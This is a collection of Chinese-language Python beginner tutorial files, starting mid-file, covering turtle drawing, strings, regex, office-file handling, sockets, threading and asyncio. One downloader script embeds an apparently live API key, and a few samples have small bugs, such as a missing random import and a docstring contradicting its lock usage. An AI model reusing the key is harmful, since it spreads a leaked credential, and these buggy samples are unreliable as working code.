# 画小星星 for x_pos, y_pos in zip(x_poses, y_poses): turtle.goto(x + x_pos * pice, y + height - y_pos * pice) turtle.left(turtle.towards(center_x, center_y) - turtle.heading()) turtle.forward(pice) turtle.right(90) draw_star(turtle.xcor(), turtle.ycor(), pice) # 隐藏海龟 turtle.ht() # 显示绘图窗口 turtle.mainloop() if __name__ == '__main__': main() File: Day01-15/code/Day01/peppa_pig.py """ 绘制小猪佩奇 """ from turtle import * def nose(x,y): """画鼻子""" penup() # 将海龟移动到指定的坐标 goto(x,y) pendown() # 设置海龟的方向(0-东、90-北、180-西、270-南) setheading(-30) begin_fill() a = 0.4 for i in range(120): if 0 <= i < 30 or 60 <= i <90: a = a + 0.08 # 向左转3度 left(3) # 向前走 forward(a) else: a = a - 0.08 left(3) forward(a) end_fill() penup() setheading(90) forward(25) setheading(0) forward(10) pendown() # 设置画笔的颜色(红, 绿, 蓝) pencolor(255, 155, 192) setheading(10) begin_fill() circle(5) color(160, 82, 45) end_fill() penup() setheading(0) forward(20) pendown() pencolor(255, 155, 192) setheading(10) begin_fill() circle(5) color(160, 82, 45) end_fill() def head(x, y): """画头""" color((255, 155, 192), "pink") penup() goto(x,y) setheading(0) pendown() begin_fill() setheading(180) circle(300, -30) circle(100, -60) circle(80, -100) circle(150, -20) circle(60, -95) setheading(161) circle(-300, 15) penup() goto(-100, 100) pendown() setheading(-30) a = 0.4 for i in range(60): if 0<= i < 30 or 60 <= i < 90: a = a + 0.08 lt(3) #向左转3度 fd(a) #向前走a的步长 else: a = a - 0.08 lt(3) fd(a) end_fill() def ears(x,y): """画耳朵""" color((255, 155, 192), "pink") penup() goto(x, y) pendown() begin_fill() setheading(100) circle(-50, 50) circle(-10, 120) circle(-50, 54) end_fill() penup() setheading(90) forward(-12) setheading(0) forward(30) pendown() begin_fill() setheading(100) circle(-50, 50) circle(-10, 120) circle(-50, 56) end_fill() def eyes(x,y): """画眼睛""" color((255, 155, 192), "white") penup() setheading(90) forward(-20) setheading(0) forward(-95) pendown() begin_fill() circle(15) end_fill() color("black") penup() setheading(90) forward(12) setheading(0) forward(-3) pendown() begin_fill() circle(3) end_fill() color((255, 155, 192), "white") penup() seth(90) forward(-25) seth(0) forward(40) pendown() begin_fill() circle(15) end_fill() color("black") penup() setheading(90) forward(12) setheading(0) forward(-3) pendown() begin_fill() circle(3) end_fill() def cheek(x,y): """画脸颊""" color((255, 155, 192)) penup() goto(x,y) pendown() setheading(0) begin_fill() circle(30) end_fill() def mouth(x,y): """画嘴巴""" color(239, 69, 19) penup() goto(x, y) pendown() setheading(-80) circle(30, 40) circle(40, 80) def setting(): """设置参数""" pensize(4) # 隐藏海龟 hideturtle() colormode(255) color((255, 155, 192), "pink") setup(840, 500) speed(10) def main(): """主函数""" setting() nose(-100, 100) head(-69, 167) ears(0, 160) eyes(0, 140) cheek(80, 10) mouth(-20, 30) done() if __name__ == '__main__': main() File: Day01-15/code/Day12/str2.py """ 字符串常用操作 - 实现字符串倒转的方法 Version: 0.1 Author: 骆昊 Date: 2018-03-19 """ from io import StringIO def reverse_str1(str): return str[::-1] def reverse_str2(str): if len(str) <= 1: return str return reverse_str2(str[1:]) + str[0:1] def reverse_str3(str): # StringIO对象是Python中的可变字符串 # 不应该使用不变字符串做字符串连接操作 因为会产生很多无用字符串对象 rstr = StringIO() str_len = len(str) for index in range(str_len - 1, -1, -1): rstr.write(str[index]) return rstr.getvalue() def reverse_str4(str): return ''.join(str[index] for index in range(len(str) - 1, -1, -1)) def reverse_str5(str): # 将字符串处理成列表 str_list = list(str) str_len = len(str) # 使用zip函数将两个序列合并成一个产生元组的迭代器 # 每次正好可以取到一前一后两个下标来实现元素的交换 for i, j in zip(range(str_len // 2), range(str_len - 1, str_len // 2, -1)): str_list[i], str_list[j] = str_list[j], str_list[i] # 将列表元素连接成字符串 return ''.join(str_list) if __name__ == '__main__': str = 'I love Python' print(reverse_str1(str)) print(str) print(reverse_str2(str)) print(str) print(reverse_str3(str)) print(str) print(reverse_str4(str)) print(str) print(reverse_str5(str)) print(str) File: Day01-15/code/Day12/test4.py import re def main(): # 创建正则表达式对象 使用了前瞻和回顾来保证手机号前后不应该出现数字 pattern = re.compile(r'(?<=\D)(1[38]\d{9}|14[57]\d{8}|15[0-35-9]\d{8}|17[678]\d{8})(?=\D)') sentence = ''' 重要的事情说8130123456789遍,我的手机号是13512346789这个靓号, 不是15600998765,也是110或119,王大锤的手机号才是15600998765。 ''' # 查找所有匹配并保存到一个列表中 mylist = re.findall(pattern, sentence) print(mylist) print('--------华丽的分隔线--------') # 通过迭代器取出匹配对象并获得匹配的内容 for temp in pattern.finditer(sentence): print(temp.group()) print('--------华丽的分隔线--------') # 通过search函数指定搜索位置找出所有匹配 m = pattern.search(sentence) while m: print(m.group()) m = pattern.search(sentence, m.end()) if __name__ == '__main__': main() File: Day01-15/code/Day12/test5.py """ 不良内容过滤 """ import re def main(): sentence = '你丫是傻叉吗? 我操你大爷的. Fuck you.' purified = re.sub('[操肏艹]|fuck|shit|傻[比屄逼叉缺吊屌]|煞笔', '*', sentence, flags=re.IGNORECASE) print(purified) if __name__ == '__main__': main() File: Day01-15/code/Day12/test3.py """ 验证输入用户名和QQ号是否有效并给出对应的提示信息 要求: 用户名必须由字母、数字或下划线构成且长度在6~20个字符之间 QQ号是5~12的数字且首位不能为0 """ import re def main(): username = input('请输入用户名: ') qq = input('请输入QQ号: ') m1 = re.match(r'^[0-9a-zA-Z_]{6,20}$', username) if not m1: print('请输入有效的用户名.') m2 = re.match(r'^[1-9]\d{4,11}$', qq) if not m2: print('请输入有效的QQ号.') if m1 and m2: print('你输入的信息是有效的!') if __name__ == '__main__': main() File: Day01-15/code/Day12/str1.py """ 字符串常用操作 Version: 0.1 Author: 骆昊 Date: 2018-03-19 """ import pyperclip # 转义字符 print('My brother\'s name is \'007\'') # 原始字符串 print(r'My brother\'s name is \'007\'') str = 'hello123world' print('he' in str) print('her' in str) # 字符串是否只包含字母 print(str.isalpha()) # 字符串是否只包含字母和数字 print(str.isalnum()) # 字符串是否只包含数字 print(str.isdecimal()) print(str[0:5].isalpha()) print(str[5:8].isdecimal()) list = ['床前明月光', '疑是地上霜', '举头望明月', '低头思故乡'] print('-'.join(list)) sentence = 'You go your way I will go mine' words_list = sentence.split() print(words_list) email = ' [email protected] ' print(email) print(email.strip()) print(email.lstrip()) # 将文本放入系统剪切板中 pyperclip.copy('老虎不发猫你当我病危呀') # 从系统剪切板获得文本 # print(pyperclip.paste()) File: Day01-15/code/Day15/word1.py """ 创建Word文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ File: Day01-15/code/Day15/pdf1.py """ 创建PDF文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ File: Day01-15/code/Day15/excel1.py """ 创建Excel文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from openpyxl import Workbook from openpyxl.worksheet.table import Table, TableStyleInfo workbook = Workbook() sheet = workbook.active data = [ [1001, '白元芳', '男', '13123456789'], [1002, '白洁', '女', '13233445566'] ] sheet.append(['学号', '姓名', '性别', '电话']) for row in data: sheet.append(row) tab = Table(displayName="Table1", ref="A1:E5") tab.tableStyleInfo = TableStyleInfo( name="TableStyleMedium9", showFirstColumn=False, showLastColumn=False, showRowStripes=True, showColumnStripes=True) sheet.add_table(tab) workbook.save('./res/全班学生数据.xlsx') File: Day01-15/code/Day15/excel2.py """ 读取Excel文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from openpyxl import load_workbook from openpyxl import Workbook workbook = load_workbook('./res/学生明细表.xlsx') print(workbook.sheetnames) sheet = workbook[workbook.sheetnames[0]] print(sheet.title) for row in range(2, 7): for col in range(65, 70): cell_index = chr(col) + str(row) print(sheet[cell_index].value, end='\t') print() File: Day01-15/code/Day15/pdf2.py """ 读取PDF文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from PyPDF2 import PdfFileReader with open('./res/Python课程大纲.pdf', 'rb') as f: reader = PdfFileReader(f, strict=False) print(reader.numPages) if reader.isEncrypted: reader.decrypt('') current_page = reader.getPage(5) print(current_page) print(current_page.extractText()) File: Day01-15/code/Day15/pillow1.py """ 使用pillow操作图像 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from PIL import Image img = Image.open('./res/guido.jpg') print(img.size) print(img.format) print(img.format_description) img.save('./res/guido.png') img2 = Image.open('./res/guido.png') img3 = img2.crop((335, 435, 430, 615)) for x in range(4): for y in range(5): img2.paste(img3, (95 * y , 180 * x)) img2.resize((img.size[0] // 2, img.size[1] // 2)) img2.rotate(90) img2.save('./res/guido2.png') File: Day01-15/code/Day15/word2.py """ 读取Word文件 Version: 0.1 Author: 骆昊 Date: 2018-03-26 """ from docx import Document doc = Document('./res/用函数还是用复杂的表达式.docx') print(len(doc.paragraphs)) print(doc.paragraphs[0].text) # print(doc.paragraphs[1].runs[0].text) content = [] for para in doc.paragraphs: content.append(para.text) print(''.join(content)) File: Day01-15/code/Day14/fileclient.py from socket import socket from json import loads from base64 import b64decode def main(): client = socket() client.connect(('192.168.1.2', 5566)) # 定义一个保存二进制数据的对象 in_data = bytes() # 由于不知道服务器发送的数据有多大每次接收1024字节 data = client.recv(1024) while data: # 将收到的数据拼接起来 in_data += data data = client.recv(1024) # 将收到的二进制数据解码成JSON字符串并转换成字典 # loads函数的作用就是将JSON字符串转成字典对象 my_dict = loads(in_data.decode('utf-8')) filename = my_dict['filename'] filedata = my_dict['filedata'].encode('utf-8') with open('/Users/Hao/' + filename, 'wb') as f: # 将base64格式的数据解码成二进制数据并写入文件 f.write(b64decode(filedata)) print('图片已保存.') if __name__ == '__main__': main() File: Day01-15/code/Day14/chatserver.py from socket import socket from threading import Thread def main(): class ClientHandler(Thread): def __init__(self, client): super().__init__() self._client = client def run(self): try: while True: try: data = self._client.recv(1024) if data.decode('utf-8') == 'byebye': clients.remove(self._client) self._client.close() break else: for client in clients: client.send(data) except Exception as e: print(e) clients.remove(self._client) break except Exception as e: print(e) server = socket() server.bind(('10.7.189.118', 12345)) server.listen(512) clients = [] while True: curr_client, addr = server.accept() print(addr[0], '连接到服务器.') clients.append(curr_client) ClientHandler(curr_client).start() if __name__ == '__main__': main() File: Day01-15/code/Day14/fileserver.py from socket import socket, SOCK_STREAM, AF_INET from base64 import b64encode from json import dumps from threading import Thread def main(): # 自定义线程类 class FileTransferHandler(Thread): def __init__(self, cclient): super().__init__() self.cclient = cclient def run(self): my_dict = {} my_dict['filename'] = 'guido.jpg' # JSON是纯文本不能携带二进制数据 # 所以图片的二进制数据要处理成base64编码 my_dict['filedata'] = data # 通过dumps函数将字典处理成JSON字符串 json_str = dumps(my_dict) # 发送JSON字符串 self.cclient.send(json_str.encode('utf-8')) self.cclient.close() # 1.创建套接字对象并指定使用哪种传输服务 server = socket() # 2.绑定IP地址和端口(区分不同的服务) server.bind(('192.168.1.2', 5566)) # 3.开启监听 - 监听客户端连接到服务器 server.listen(512) print('服务器启动开始监听...') with open('guido.jpg', 'rb') as f: # 将二进制数据处理成base64再解码成字符串 data = b64encode(f.read()).decode('utf-8') while True: client, addr = server.accept() # 用一个字典(键值对)来保存要发送的各种数据 # 待会可以将字典处理成JSON格式在网络上传递 FileTransferHandler(client).start() if __name__ == '__main__': main() File: Day01-15/code/Day14/socket4.py """ 套接字 - 基于UDP协议创建Echo客户端 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * client = socket(AF_INET, SOCK_DGRAM) while True: data_str = input('请输入: ') client.sendto(data_str.encode('utf-8'), ('localhost', 6789)) data, addr = client.recvfrom(1024) data_str = data.decode('utf-8') print('服务器回应:', data_str) if data_str == 'bye': break client.close() File: Day01-15/code/Day14/mmdownloader.py from time import time from threading import Thread import requests class DownloadHanlder(Thread): def __init__(self, url): super().__init__() self.url = url def run(self): filename = self.url[self.url.rfind('/') + 1:] resp = requests.get(self.url) with open('/Users/Hao/Downloads/' + filename, 'wb') as f: f.write(resp.content) def main(): # 通过requests模块的get函数获取网络资源 resp = requests.get( 'http://api.tianapi.com/meinv/?key=772a81a51ae5c780251b1f98ea431b84&num=10') # 将服务器返回的JSON格式的数据解析为字典 data_model = resp.json() for mm_dict in data_model['newslist']: url = mm_dict['picUrl'] # 通过多线程的方式实现图片下载 DownloadHanlder(url).start() if __name__ == '__main__': main() File: Day01-15/code/Day14/chatclient.py from socket import socket from threading import Thread def main(): class RefreshScreenThread(Thread): def __init__(self, client): super().__init__() self._client = client def run(self): while running: data = self._client.recv(1024) print(data.decode('utf-8')) nickname = input('请输入你的昵称: ') myclient = socket() myclient.connect(('10.7.189.118', 12345)) running = True RefreshScreenThread(myclient).start() while running: content = input('请发言: ') if content == 'byebye': myclient.send(content.encode('utf-8')) running = False else: msg = nickname + ': ' + content myclient.send(msg.encode('utf-8')) if __name__ == '__main__': main() File: Day01-15/code/Day14/socket5.py """ 使用socketserver模块创建时间服务器 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socketserver import TCPServer, StreamRequestHandler from time import * class EchoRequestHandler(StreamRequestHandler): def handle(self): currtime = localtime(time()) timestr = strftime('%Y-%m-%d %H:%M:%S', currtime) self.wfile.write(timestr.encode('utf-8')) server = TCPServer(('localhost', 6789), EchoRequestHandler) server.serve_forever() File: Day01-15/code/Day14/socket1.py """ 套接字 - 基于TCP协议创建时间服务器 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * from time import * server = socket(AF_INET, SOCK_STREAM) server.bind(('localhost', 6789)) server.listen() print('服务器已经启动正在监听客户端连接.') while True: client, addr = server.accept() print('客户端%s:%d连接成功.' % (addr[0], addr[1])) currtime = localtime(time()) timestr = strftime('%Y-%m-%d %H:%M:%S', currtime) client.send(timestr.encode('utf-8')) client.close() server.close() File: Day01-15/code/Day14/timeserver.py from socket import socket, SOCK_STREAM, AF_INET from datetime import datetime def main(): # 1.创建套接字对象并指定使用哪种传输服务 # family=AF_INET - IPv4地址 # family=AF_INET6 - IPv6地址 # type=SOCK_STREAM - TCP套接字 # type=SOCK_DGRAM - UDP套接字 # type=SOCK_RAW - 原始套接字 server = socket(family=AF_INET, type=SOCK_STREAM) # 2.绑定IP地址和端口(区分不同的服务) server.bind(('192.168.1.2', 6789)) # 3.开启监听 - 监听客户端连接到服务器 server.listen(512) print('服务器启动开始监听...') # 4.通过循环接收客户端的连接并作出相应的处理(提供服务) while True: # accept方法是一个阻塞方法如果没有客户端连接到服务器 # 这个方法就会阻塞代码不会向下执行 # accept方法返回元组其中的第一个元素是客户端对象 # 第二个元素是客户端的地址(由IP和端口两部分构成) client, addr = server.accept() print(str(addr) + '连接到了服务器.') # 5.发送数据 client.send(str(datetime.now()).encode('utf-8')) # 6.断开连接 client.close() if __name__ == '__main__': main() File: Day01-15/code/Day14/socket2.py """ 套接字 - 基于TCP协议创建时间客户端 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * client = socket(AF_INET, SOCK_STREAM) client.connect(('localhost', 6789)) while True: data = client.recv(1024) if not data: break print(data.decode('utf-8')) client.close() File: Day01-15/code/Day14/socket3.py """ 套接字 - 基于UDP协议Echo服务器 Version: 0.1 Author: 骆昊 Date: 2018-03-22 """ from socket import * from time import * server = socket(AF_INET, SOCK_DGRAM) server.bind(('localhost', 6789)) while True: data, addr = server.recvfrom(1024) server.sendto(data, addr) server.close() File: Day01-15/code/Day14/timeclient.py from socket import socket def main(): client = socket() client.connect(('10.7.152.69', 6789)) print(client.recv(1024).decode('utf-8')) client.close() if __name__ == '__main__': main() File: Day01-15/code/Day13/multithread4.py """ 使用多线程的情况 - 耗时间的任务在独立的线程中执行 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import time import tkinter import tkinter.messagebox from threading import Thread def main(): class DownloadTaskHandler(Thread): def run(self): # 模拟下载任务需要花费10秒钟时间 time.sleep(10) tkinter.messagebox.showinfo('提示', '下载完成!') # 启用下载按钮 button1.config(state=tkinter.NORMAL) def download(): # 禁用下载按钮 button1.config(state=tkinter.DISABLED) # 通过daemon参数将线程设置为守护线程(主程序退出就不再保留执行) DownloadTaskHandler(daemon=True).start() def show_about(): tkinter.messagebox.showinfo('关于', '作者: 骆昊(v1.0)') top = tkinter.Tk() top.title('单线程') top.geometry('200x150') top.wm_attributes('-topmost', 1) panel = tkinter.Frame(top) button1 = tkinter.Button(panel, text='下载', command=download) button1.pack(side='left') button2 = tkinter.Button(panel, text='关于', command=show_about) button2.pack(side='right') panel.pack(side='bottom') tkinter.mainloop() if __name__ == '__main__': main() File: Day01-15/code/Day13/singlethread1.py """ 不使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from time import time, sleep def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) sleep(time_to_download) print('下载完成! 耗费了%d秒' % time_to_download) def main(): start = time() download_task('Python从入门到住院.pdf') download_task('Peking Hot.avi') end = time() print('总共耗费了%.2f秒.' % (end - start)) if __name__ == '__main__': main() File: Day01-15/code/Day13/multithread1.py """ 使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from time import time, sleep import atexit import _thread def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) print('剩余时间%d秒.' % time_to_download) sleep(time_to_download) print('%s下载完成!' % filename) def shutdown_hook(start): end = time() print('总共耗费了%.3f秒.' % (end - start)) def main(): start = time() # 将多个下载任务放到多个线程中执行 thread1 = _thread.start_new_thread(download_task, ('Python从入门到住院.pdf',)) thread2 = _thread.start_new_thread(download_task, ('Peking Hot.avi',)) # 注册关机钩子在程序执行结束前计算执行时间 atexit.register(shutdown_hook, start) if __name__ == '__main__': main() # 执行这里的代码会引发致命错误(不要被这个词吓到) 因为主线程结束后下载线程再想执行就会出问题 # 需要说明一下 由于_thread模块属于比较底层的线程操作而且不支持守护线程的概念 # 在实际开发中会有诸多不便 因此我们推荐使用threading模块提供的高级操作进行多线程编程 File: Day01-15/code/Day13/generator1.py """ 生成器 - 生成器语法 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ seq = [x * x for x in range(10)] print(seq) gen = (x * x for x in range(10)) print(gen) for x in gen: print(x) num = 10 gen = (x ** y for x, y in zip(range(1, num), range(num - 1, 0, -1))) print(gen) n = 1 while n < num: print(next(gen)) n += 1 File: Day01-15/code/Day13/multithread5.py """ 多个线程共享数据 - 没有锁的情况 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from time import sleep from threading import Thread, Lock class Account(object): def __init__(self): self._balance = 0 self._lock = Lock() def deposit(self, money): # 先获取锁才能执行后续的代码 self._lock.acquire() try: new_balance = self._balance + money sleep(0.01) self._balance = new_balance finally: # 这段代码放在finally中保证释放锁的操作一定要执行 self._lock.release() @property def balance(self): return self._balance class AddMoneyThread(Thread): def __init__(self, account, money): super().__init__() self._account = account self._money = money def run(self): self._account.deposit(self._money) def main(): account = Account() threads = [] # 创建100个存款的线程向同一个账户中存钱 for _ in range(100): t = AddMoneyThread(account, 1) threads.append(t) t.start() # 等所有存款的线程都执行完毕∫ for t in threads: t.join() print('账户余额为: ¥%d元' % account.balance) if __name__ == '__main__': main() File: Day01-15/code/Day13/multiprocess1.py """ 使用Process类创建多个进程 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ # 通过下面程序的执行结果可以证实 父进程在创建子进程时复制了进程及其数据结构 # 每个进程都有自己独立的内存空间 所以进程之间共享数据只能通过IPC的方式 from multiprocessing import Process, Queue, current_process from time import sleep def sub_task(content, counts): print(f'PID: {current_process().pid}') counter = 0 while counter < counts: counter += 1 print(f'{counter}: {content}') sleep(0.01) def main(): number = random.randrange(5, 10) Process(target=sub_task, args=('Ping', number)).start() Process(target=sub_task, args=('Pong', number)).start() if __name__ == '__main__': main() File: Day01-15/code/Day13/asyncio1.py """ 异步I/O操作 - asyncio模块 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ import asyncio import threading # import time @asyncio.coroutine def hello(): print('%s: hello, world!' % threading.current_thread()) # 休眠不会阻塞主线程因为使用了异步I/O操作 # 注意有yield from才会等待休眠操作执行完成 yield from asyncio.sleep(2) # asyncio.sleep(1) # time.sleep(1) print('%s: goodbye, world!' % threading.current_thread()) loop = asyncio.get_event_loop() tasks = [hello(), hello()] # 等待两个异步I/O操作执行结束 loop.run_until_complete(asyncio.wait(tasks)) print('game over!') loop.close() File: Day01-15/code/Day13/coroutine1.py """ 使用协程 - 模拟快递中心派发快递 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ from time import sleep from random import random def build_deliver_man(man_id): total = 0 while True: total += 1 print('%d号快递员准备接今天的第%d单.' % (man_id, total)) pkg = yield print('%d号快递员收到编号为%s的包裹.' % (man_id, pkg)) sleep(random() * 3) def package_center(deliver_man, max_per_day): num = 1 deliver_man.send(None) # next(deliver_man) while num <= max_per_day: package_id = 'PKG-%d' % num deliver_man.send(package_id) num += 1 sleep(0.1) deliver_man.close() print('今天的包裹派送完毕!') dm = build_deliver_man(1) package_center(dm, 10) # 两个函数虽然没有调用关系但是创建快递员的函数作为一个协程协助了快递中心函数完成任务 # 想一想如果有多个快递员的时候应该如何处理 File: Day01-15/code/Day13/multiprocess4.py from time import time def main(): total = 0 number_list = [x for x in range(1, 100000001)] start = time() for number in number_list: total += number print(total) end = time() print('Execution time: %.3fs' % (end - start)) if __name__ == '__main__': main() File: Day01-15/code/Day13/test2.py import time from threading import Thread, Lock class Account(object): def __init__(self, balance=0): self._balance = balance self._lock = Lock() @property def balance(self): return self._balance def deposit(self, money): # 当多个线程同时访问一个资源的时候 就有可能因为竞争资源导致资源的状态错误 # 被多个线程访问的资源我们通常称之为临界资源 对临界资源的访问需要加上保护 if money > 0: self._lock.acquire() try: new_balance = self._balance + money time.sleep(0.01) self._balance = new_balance finally: self._lock.release() class AddMoneyThread(Thread): def __init__(self, account): super().__init__() self._account = account def run(self): self._account.deposit(1) def main(): account = Account(1000) tlist = [] for _ in range(100): t = AddMoneyThread(account) tlist.append(t) t.start() for t in tlist: t.join() print('账户余额: %d元' % account.balance) if __name__ == '__main__': main() File: Day01-15/code/Day13/asyncio2.py """ 异步I/O操作 - async和await Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ import asyncio import threading # 通过async修饰的函数不再是普通函数而是一个协程 # 注意async和await将在Python 3.7中作为关键字出现 async def hello(): print('%s: hello, world!' % threading.current_thread()) await asyncio.sleep(2) print('%s: goodbye, world!' % threading.current_thread()) loop = asyncio.get_event_loop() tasks = [hello(), hello()] # 等待两个异步I/O操作执行结束 loop.run_until_complete(asyncio.wait(tasks)) loop.close() File: Day01-15/code/Day13/coroutine2.py """ 使用协程 - 查看协程的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ from time import sleep from inspect import getgeneratorstate def build_deliver_man(man_id): total = 0 while True: total += 1 print('%d号快递员准备接今天的第%d单.' % (man_id, total)) pkg = yield print('%d号快递员收到编号为%s的包裹.' % (man_id, pkg)) sleep(0.5) def package_center(deliver_man, max_per_day): num = 1 # 创建状态(GEN_CREATED) - 等待开始执行 print(getgeneratorstate(deliver_man)) deliver_man.send(None) # 挂起状态(GEN_SUSPENDED) - 在yield表达式处暂停 print(getgeneratorstate(deliver_man)) # next(deliver_man) while num <= max_per_day: package_id = 'PKG-%d' % num deliver_man.send(package_id) num += 1 deliver_man.close() # 结束状态(GEN_CLOSED) - 执行完毕 print(getgeneratorstate(deliver_man)) print('今天的包裹派送完毕!') dm = build_deliver_man(1) package_center(dm, 10) File: Day01-15/code/Day13/multiprocess3.py """ 创建进程调用其他程序 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import subprocess import sys def main(): # 通过sys.argv获取命令行参数 if len(sys.argv) > 1: # 第一个命令行参数是程序本身所以从第二个开始取 for index in range(1, len(sys.argv)): try: # 通过subprocess模块的call函数启动子进程 status = subprocess.call(sys.argv[index]) except FileNotFoundError: print('不能执行%s命令' % sys.argv[index]) else: print('请使用命令行参数指定要执行的进程') if __name__ == '__main__': main() File: Day01-15/code/Day13/test3.py from random import randint from threading import Thread from time import sleep import pygame class Color(object): BLACK = (0, 0, 0) WHITE = (255, 255, 255) GRAY = (242, 242, 242) @staticmethod def random_color(): r = randint(0, 255) g = randint(0, 255) b = randint(0, 255) return r, g, b class Car(object): def __init__(self, x, y, color): self._x = x self._y = y self._color = color def move(self): if self._x + 80 < 950: self._x += randint(1, 10) def draw(self, screen): pygame.draw.rect(screen, self._color, (self._x, self._y, 80, 40), 0) def main(): class BackgroundTask(Thread): def run(self): while True: screen.fill(Color.GRAY) pygame.draw.line(screen, Color.BLACK, (130, 0), (130, 600), 4) pygame.draw.line(screen, Color.BLACK, (950, 0), (950, 600), 4) for car in cars: car.draw(screen) pygame.display.flip() sleep(0.05) for car in cars: car.move() cars = [] for index in range(5): temp = Car(50, 50 + 120 * index, Color.random_color()) cars.append(temp) pygame.init() screen = pygame.display.set_mode((1000, 600)) BackgroundTask(daemon=True).start() running = True while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False pygame.quit() if __name__ == '__main__': main() File: Day01-15/code/Day13/asyncio3.py """ 异步I/O操作 - asyncio模块 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ import asyncio async def wget(host): print('wget %s...' % host) connect = asyncio.open_connection(host, 80) # 异步方式等待连接结果 reader, writer = await connect header = 'GET / HTTP/1.0\r\nHost: %s\r\n\r\n' % host writer.write(header.encode('utf-8')) # 异步I/O方式执行写操作 await writer.drain() while True: # 异步I/O方式执行读操作 line = await reader.readline() if line == b'\r\n': break print('%s header > %s' % (host, line.decode('utf-8').rstrip())) writer.close() loop = asyncio.get_event_loop() # 通过生成式语法创建一个装了三个协程的列表 hosts_list = ['www.sina.com.cn', 'www.sohu.com', 'www.163.com'] tasks = [wget(host) for host in hosts_list] # 下面的方法将异步I/O操作放入EventLoop直到执行完毕 loop.run_until_complete(asyncio.wait(tasks)) loop.close() File: Day01-15/code/Day13/multiprocess2.py """ 实现进程间的通信 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import multiprocessing import os def sub_task(queue): print('子进程进程号:', os.getpid()) counter = 0 while counter < 1000: queue.put('Pong') counter += 1 if __name__ == '__main__': print('当前进程号:', os.getpid()) queue = multiprocessing.Queue() p = multiprocessing.Process(target=sub_task, args=(queue,)) p.start() counter = 0 while counter < 1000: queue.put('Ping') counter += 1 p.join() print('子任务已经完成.') for _ in range(2000): print(queue.get(), end='') File: Day01-15/code/Day13/multithread2.py """ 使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from threading import Thread from time import time, sleep def download_task(filename): print('开始下载%s...' % filename) time_to_download = randint(5, 10) sleep(time_to_download) print('%s下载完成! 耗费了%d秒' % (filename, time_to_download)) def main(): start = time() thread1 = Thread(target=download_task, args=('Python从入门到住院.pdf',)) thread1.start() thread2 = Thread(target=download_task, args=('Peking Hot.avi',)) thread2.start() thread1.join() thread2.join() end = time() print('总共耗费了%.3f秒' % (end - start)) if __name__ == '__main__': main() File: Day01-15/code/Day13/generator2.py """ 生成器 - 使用yield关键字 Version: 0.1 Author: 骆昊 Date: 2018-03-21 """ def fib(num): n, a, b = 0, 0, 1 while n < num: yield b a, b = b, a + b n += 1 for x in fib(20): print(x) File: Day01-15/code/Day13/multithread6.py """ 多个线程共享数据 - 有锁的情况 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import time import threading class Account(object): def __init__(self): self._balance = 0 self._lock = threading.Lock() def deposit(self, money): # 获得锁后代码才能继续执行 self._lock.acquire() try: new_balance = self._balance + money time.sleep(0.01) self._balance = new_balance finally: # 操作完成后一定要记着释放锁 self._lock.release() @property def balance(self): return self._balance if __name__ == '__main__': account = Account() # 创建100个存款的线程向同一个账户中存钱 for _ in range(100): threading.Thread(target=account.deposit, args=(1,)).start() # 等所有存款的线程都执行完毕 time.sleep(2) print('账户余额为: ¥%d元' % account.balance) # 想一想结果为什么不是我们期望的100元 File: Day01-15/code/Day13/singlethread2.py """ 不使用多线程的情况 - 耗时间的任务阻塞主事件循环 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ import time import tkinter import tkinter.messagebox def download(): # 模拟下载任务需要花费10秒钟时间 time.sleep(10) tkinter.messagebox.showinfo('提示', '下载完成!') def show_about(): tkinter.messagebox.showinfo('关于', '作者: 骆昊(v1.0)') def main(): top = tkinter.Tk() top.title('单线程') top.geometry('200x150') top.wm_attributes('-topmost', True) panel = tkinter.Frame(top) button1 = tkinter.Button(panel, text='下载', command=download) button1.pack(side='left') button2 = tkinter.Button(panel, text='关于', command=show_about) button2.pack(side='right') panel.pack(side='bottom') tkinter.mainloop() if __name__ == '__main__': main() # 在不使用多线程的情况下 一旦点击下载按钮 由于该操作需要花费10秒中的时间 # 整个主消息循环也会被阻塞10秒钟无法响应其他的事件 # 事实上 对于没有因果关系的子任务 这种顺序执行的方式并不合理 File: Day01-15/code/Day13/multithread3.py """ 使用多线程的情况 - 模拟多个下载任务 Version: 0.1 Author: 骆昊 Date: 2018-03-20 """ from random import randint from time import time, sleep import threading class DownloadTask(threading.Thread): def __init__(self, filename): super().__init__() self._filename = filename def run(self): print('开始下载%s...' % self._filename) time_to_download = randint(5, 10) print('剩余时间%d秒.' % time_to_download) sleep(time_to_download) print('%s下载完成!' % self._filename) def main(): start = time() # 将多个下载任务放到多个线程中执行 # 通过自定义的线程类创建线程对象 线程启动后会回调执行run方法 thread1 = DownloadTask('Python从入门到住院.pdf') thread1.start() thread2 = DownloadTask('Peking Hot.avi') thread2.start() thread1.join() thread2.join() end = time() print('总共耗费了%.3f秒' % (end - start)) if __name__ == '__main__': main() # 